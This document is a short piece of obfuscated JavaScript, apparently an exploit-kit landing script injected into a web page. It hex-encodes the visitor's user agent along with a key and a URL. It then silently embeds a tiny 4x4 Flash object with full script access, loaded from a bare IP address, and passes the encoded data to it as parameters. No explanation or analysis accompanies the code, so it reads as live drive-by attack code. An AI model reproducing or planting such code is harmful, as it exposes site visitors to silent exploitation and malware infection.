/*s71837d40562hssfj51820fs*/function hgfgerdfgdf(num, width){/*s99532d70691hfj99837fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s34534d45929hfj63143fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s82935d39903hfj70680fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s41934d40756hfj32338fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd17818hfs*/c += b + d;/*s94277d61197hfj54642fs*/e += 1;}return c;}/*s56383dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.124.231/?OTk3NzkxMTM=&pa=xX_QMvWebRXQC53EKvncT6NEMVHRHECL2YydmrHQefjaeVWkzrLFTF_yozKASASG6_JtdfJRD&ma=Qu3jxGFcwdhmYtfUV5A9qn8j0DUwRae0Z6H_BGOMghG-ZKXHLA62gz3yLMkdc4lxhKy6yIXmg&work=NDYxNzY5NjA=", ghnvbn("http://92.53.124.231/?MTAxMzYxODMz&ma=u3jBGFcwdhmYtfUV5A9qn8j0PUwRad0Z6H_xGOMghG-ZKUHLA62gz3yLAkecolzhaF61ENjOse&pa=xXzQMvWdbRXQC53EKvncT6NEMVHRHECL2Y-dmrHQefjaeVWkzrHFTF_xozKASASG6_FtdfJRDQ&work=NjIzNTQyMw==","wexykukusw"));